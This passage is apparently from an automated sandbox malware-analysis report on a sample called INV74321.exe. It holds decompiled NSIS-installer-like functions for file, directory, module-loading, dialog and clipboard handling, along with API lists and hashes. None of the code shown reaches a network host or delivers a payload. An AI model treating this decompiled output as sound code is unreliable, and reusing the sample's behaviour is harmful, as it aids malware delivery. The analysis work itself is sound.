                                                          							}
                                                          						}
                                                          						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                          						 *_t32 = _t23;
                                                          						_t30 = _t32 + 1;
                                                          					} while (_t23 != _t26);
                                                          				}
                                                          				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                          					_push(0xfffffff5);
                                                          					E00401423();
                                                          				} else {
                                                          					E00401423(0xffffffe6);
                                                          					E004060F7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t28);
                                                          					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                          					if(_t19 == 0) {
                                                          						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                          					}
                                                          				}
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
                                                          				return 0;
                                                          			}














                                                          APIs
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                            • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 1892508949-501415292
                                                          • Opcode ID: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                          • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                          • Opcode Fuzzy Hash: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                          • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 59%
                                                          			E00401389(signed int _a4) {
                                                          				intOrPtr* _t6;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          				signed int _t11;
                                                          				void* _t12;
                                                          				signed int _t16;
                                                          				signed int _t17;
                                                          				void* _t18;
                                                          
                                                          				_t17 = _a4;
                                                          				while(_t17 >= 0) {
                                                          					_t6 = _t17 * 0x1c +  *0x42f470;
                                                          					if( *_t6 == 1) {
                                                          						break;
                                                          					}
                                                          					_push(_t6); // executed
                                                          					_t8 = E00401434(); // executed
                                                          					if(_t8 == 0x7fffffff) {
                                                          						return 0x7fffffff;
                                                          					}
                                                          					_t10 = E0040136D(_t8);
                                                          					if(_t10 != 0) {
                                                          						_t11 = _t10 - 1;
                                                          						_t16 = _t17;
                                                          						_t17 = _t11;
                                                          						_t12 = _t11 - _t16;
                                                          					} else {
                                                          						_t12 = _t10 + 1;
                                                          						_t17 = _t17 + 1;
                                                          					}
                                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                          						 *0x42ec0c =  *0x42ec0c + _t12;
                                                          						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
                                                          					}
                                                          				}
                                                          				return 0;
                                                          			}












                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                          • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00406500(signed int _a4) {
                                                          				struct HINSTANCE__* _t5;
                                                          				signed int _t10;
                                                          
                                                          				_t10 = _a4 << 3;
                                                          				_t8 =  *(_t10 + 0x40a240);
                                                          				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                                                          				if(_t5 != 0) {
                                                          					L2:
                                                          					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                                                          				}
                                                          				_t5 = E00406492(_t8); // executed
                                                          				if(_t5 == 0) {
                                                          					return 0;
                                                          				}
                                                          				goto L2;
                                                          			}






                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                            • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                            • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                          • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E00405C90(CHAR* _a4, long _a8, long _a12) {
                                                          				signed int _t5;
                                                          				void* _t6;
                                                          
                                                          				_t5 = GetFileAttributesA(_a4); // executed
                                                          				asm("sbb ecx, ecx");
                                                          				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                          				return _t6;
                                                          			}






                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00405C94
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                          • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405C6B(CHAR* _a4) {
                                                          				signed char _t3;
                                                          				signed char _t7;
                                                          
                                                          				_t3 = GetFileAttributesA(_a4); // executed
                                                          				_t7 = _t3;
                                                          				if(_t7 != 0xffffffff) {
                                                          					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                          				}
                                                          				return _t7;
                                                          			}






                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                          • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                          • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                          • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405761(CHAR* _a4) {
                                                          				int _t2;
                                                          
                                                          				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				return 0;
                                                          			}





                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                          • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                          • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                          • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405D08(void* _a4, void* _a8, long _a12) {
                                                          				int _t7;
                                                          				long _t11;
                                                          
                                                          				_t11 = _a12;
                                                          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                          					return 0;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}






                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                          • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                          • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                          • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405D37(void* _a4, void* _a8, long _a12) {
                                                          				int _t7;
                                                          				long _t11;
                                                          
                                                          				_t11 = _a12;
                                                          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                          					return 0;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}






                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00403300(long _a4) {
                                                          				long _t2;
                                                          
                                                          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                          				return _t2;
                                                          			}

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                          • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 96%
                                                          			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                          				struct HWND__* _v8;
                                                          				struct tagRECT _v24;
                                                          				void* _v32;
                                                          				signed int _v36;
                                                          				int _v40;
                                                          				int _v44;
                                                          				signed int _v48;
                                                          				int _v52;
                                                          				void* _v56;
                                                          				void* _v64;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				struct HWND__* _t87;
                                                          				struct HWND__* _t89;
                                                          				long _t90;
                                                          				int _t95;
                                                          				int _t96;
                                                          				long _t99;
                                                          				void* _t102;
                                                          				intOrPtr _t124;
                                                          				struct HWND__* _t128;
                                                          				int _t150;
                                                          				int _t153;
                                                          				long _t157;
                                                          				struct HWND__* _t161;
                                                          				struct HMENU__* _t163;
                                                          				long _t165;
                                                          				void* _t166;
                                                          				char* _t167;
                                                          				char* _t168;
                                                          				int _t169;
                                                          
                                                          				_t87 =  *0x42ec04; // 0x0
                                                          				_t157 = _a8;
                                                          				_t150 = 0;
                                                          				_v8 = _t87;
                                                          				if(_t157 != 0x110) {
                                                          					__eflags = _t157 - 0x405;
                                                          					if(_t157 == 0x405) {
                                                          						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                          					}
                                                          					__eflags = _t157 - 0x111;
                                                          					if(_t157 != 0x111) {
                                                          						L17:
                                                          						__eflags = _t157 - 0x404;
                                                          						if(_t157 != 0x404) {
                                                          							L25:
                                                          							__eflags = _t157 - 0x7b;
                                                          							if(_t157 != 0x7b) {
                                                          								goto L20;
                                                          							}
                                                          							_t89 = _v8;
                                                          							__eflags = _a12 - _t89;
                                                          							if(_a12 != _t89) {
                                                          								goto L20;
                                                          							}
                                                          							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                          							__eflags = _t90 - _t150;
                                                          							_a12 = _t90;
                                                          							if(_t90 <= _t150) {
                                                          								L36:
                                                          								return 0;
                                                          							}
                                                          							_t163 = CreatePopupMenu();
                                                          							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                          							_t95 = _a16;
                                                          							__eflags = _a16 - 0xffffffff;
                                                          							_t153 = _a16 >> 0x10;
                                                          							if(_a16 == 0xffffffff) {
                                                          								GetWindowRect(_v8,  &_v24);
                                                          								_t95 = _v24.left;
                                                          								_t153 = _v24.top;
                                                          							}
                                                          							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                          							__eflags = _t96 - 1;
                                                          							if(_t96 == 1) {
                                                          								_t165 = 1;
                                                          								__eflags = 1;
                                                          								_v56 = _t150;
                                                          								_v44 = 0x42a890;
                                                          								_v40 = 0x1000;
                                                          								_a4 = _a12;
                                                          								do {
                                                          									_a4 = _a4 - 1;
                                                          									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                          									__eflags = _a4 - _t150;
                                                          									_t165 = _t165 + _t99 + 2;
                                                          								} while (_a4 != _t150);
                                                          								OpenClipboard(_t150);
                                                          								EmptyClipboard();
                                                          								_t102 = GlobalAlloc(0x42, _t165);
                                                          								_a4 = _t102;
                                                          								_t166 = GlobalLock(_t102);
                                                          								do {
                                                          									_v44 = _t166;
                                                          									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                          									 *_t167 = 0xd;
                                                          									_t168 = _t167 + 1;
                                                          									 *_t168 = 0xa;
                                                          									_t166 = _t168 + 1;
                                                          									_t150 = _t150 + 1;
                                                          									__eflags = _t150 - _a12;
                                                          								} while (_t150 < _a12);
                                                          								GlobalUnlock(_a4);
                                                          								SetClipboardData(1, _a4);
                                                          								CloseClipboard();
                                                          							}
                                                          							goto L36;
                                                          						}
                                                          						__eflags =  *0x42ebec - _t150; // 0x0
                                                          						if(__eflags == 0) {
                                                          							ShowWindow( *0x42f428, 8);
                                                          							__eflags =  *0x42f4cc - _t150;
                                                          							if( *0x42f4cc == _t150) {
                                                          								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
                                                          							}
                                                          							E00404154(1);
                                                          							goto L25;
                                                          						}
                                                          						 *0x429c60 = 2;
                                                          						E00404154(0x78);
                                                          						goto L20;
                                                          					} else {
                                                          						__eflags = _a12 - 0x403;
                                                          						if(_a12 != 0x403) {
                                                          							L20:
                                                          							return E004041E2(_t157, _a12, _a16);
                                                          						}
                                                          						ShowWindow( *0x42ebf0, _t150);
                                                          						ShowWindow(_v8, 8);
                                                          						E004041B0(_v8);
                                                          						goto L17;
                                                          					}
                                                          				}
                                                          				_v48 = _v48 | 0xffffffff;
                                                          				_v36 = _v36 | 0xffffffff;
                                                          				_t169 = 2;
                                                          				_v56 = _t169;
                                                          				_v52 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t124 =  *0x42f434;
                                                          				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                          				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                          				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
                                                          				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
                                                          				_t128 = GetDlgItem(_a4, 0x3f8);
                                                          				 *0x42ec04 = _t128;
                                                          				_v8 = _t128;
                                                          				E004041B0( *0x42ebf0);
                                                          				 *0x42ebf4 = E00404AA1(4);
                                                          				 *0x42ec0c = 0;
                                                          				GetClientRect(_v8,  &_v24);
                                                          				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                          				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                          				if(_a12 >= 0) {
                                                          					SendMessageA(_v8, 0x1001, 0, _a12);
                                                          					SendMessageA(_v8, 0x1026, 0, _a12);
                                                          				}
                                                          				if(_a8 >= _t150) {
                                                          					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                          				}
                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          				_push(0x1b);
                                                          				E0040417B(_a4);
                                                          				if(( *0x42f43c & 0x00000003) != 0) {
                                                          					ShowWindow( *0x42ebf0, _t150);
                                                          					if(( *0x42f43c & 0x00000002) != 0) {
                                                          						 *0x42ebf0 = _t150;
                                                          					} else {
                                                          						ShowWindow(_v8, 8);
                                                          					}
                                                          					E004041B0( *0x42ebe8);
                                                          				}
                                                          				_t161 = GetDlgItem(_a4, 0x3ec);
                                                          				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                          				if(( *0x42f43c & 0x00000004) != 0) {
                                                          					SendMessageA(_t161, 0x409, _t150, _a8);
                                                          					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                          				}
                                                          				goto L36;
                                                          			}

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 004053BB
                                                          • GetDlgItem.USER32 ref: 004053CA
                                                          • GetClientRect.USER32 ref: 00405407
                                                          • GetSystemMetrics.USER32 ref: 0040540E
                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                          • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                          • GetDlgItem.USER32 ref: 004054CB
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                          • GetDlgItem.USER32 ref: 004053D9
                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                          • GetDlgItem.USER32 ref: 0040551C
                                                          • CreateThread.KERNEL32 ref: 0040552A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                          • ShowWindow.USER32(00000000), ref: 00405554
                                                          • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                          • ShowWindow.USER32(00000008), ref: 004055A1
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                          • CreatePopupMenu.USER32 ref: 004055E6
                                                          • AppendMenuA.USER32 ref: 004055FB
                                                          • GetWindowRect.USER32 ref: 0040561B
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                          • OpenClipboard.USER32(00000000), ref: 00405680
                                                          • EmptyClipboard.USER32 ref: 00405686
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                          • GlobalLock.KERNEL32 ref: 00405699
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                          • SetClipboardData.USER32 ref: 004056D1
                                                          • CloseClipboard.USER32 ref: 004056D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          • Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                          • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                          • Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                          • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				long _v16;
                                                          				long _v20;
                                                          				long _v24;
                                                          				char _v28;
                                                          				intOrPtr _v32;
                                                          				long _v36;
                                                          				char _v40;
                                                          				unsigned int _v44;
                                                          				signed int _v48;
                                                          				CHAR* _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				CHAR* _v72;
                                                          				void _v76;
                                                          				struct HWND__* _v80;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr _t82;
                                                          				long _t87;
                                                          				signed char* _t89;
                                                          				void* _t95;
                                                          				signed int _t96;
                                                          				int _t109;
                                                          				signed char _t114;
                                                          				signed int _t118;
                                                          				struct HWND__** _t122;
                                                          				intOrPtr* _t138;
                                                          				CHAR* _t146;
                                                          				intOrPtr _t147;
                                                          				unsigned int _t150;
                                                          				signed int _t152;
                                                          				unsigned int _t156;
                                                          				signed int _t158;
                                                          				signed int* _t159;
                                                          				signed char* _t160;
                                                          				struct HWND__* _t165;
                                                          				struct HWND__* _t166;
                                                          				int _t168;
                                                          				unsigned int _t197;
                                                          
                                                          				_t156 = __edx;
                                                          				_t82 =  *0x42a068;
                                                          				_v32 = _t82;
                                                          				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                          				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                          				if(_a8 == 0x40b) {
                                                          					E004057F7(0x3fb, _t146);
                                                          					E004063D2(_t146);
                                                          				}
                                                          				_t166 = _a4;
                                                          				if(_a8 != 0x110) {
                                                          					L8:
                                                          					if(_a8 != 0x111) {
                                                          						L20:
                                                          						if(_a8 == 0x40f) {
                                                          							L22:
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_v12 = _v12 & 0x00000000;
                                                          							E004057F7(0x3fb, _t146);
                                                          							if(E00405B7D(_t185, _t146) == 0) {
                                                          								_v8 = 1;
                                                          							}
                                                          							E004060F7(0x429860, _t146);
                                                          							_t87 = E00406500(1);
                                                          							_v16 = _t87;
                                                          							if(_t87 == 0) {
                                                          								L30:
                                                          								E004060F7(0x429860, _t146);
                                                          								_t89 = E00405B28(0x429860);
                                                          								_t158 = 0;
                                                          								if(_t89 != 0) {
                                                          									 *_t89 =  *_t89 & 0x00000000;
                                                          								}
                                                          								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                          									goto L35;
                                                          								} else {
                                                          									_t168 = 0x400;
                                                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                          									asm("cdq");
                                                          									_v48 = _t109;
                                                          									_v44 = _t156;
                                                          									_v12 = 1;
                                                          									goto L36;
                                                          								}
                                                          							} else {
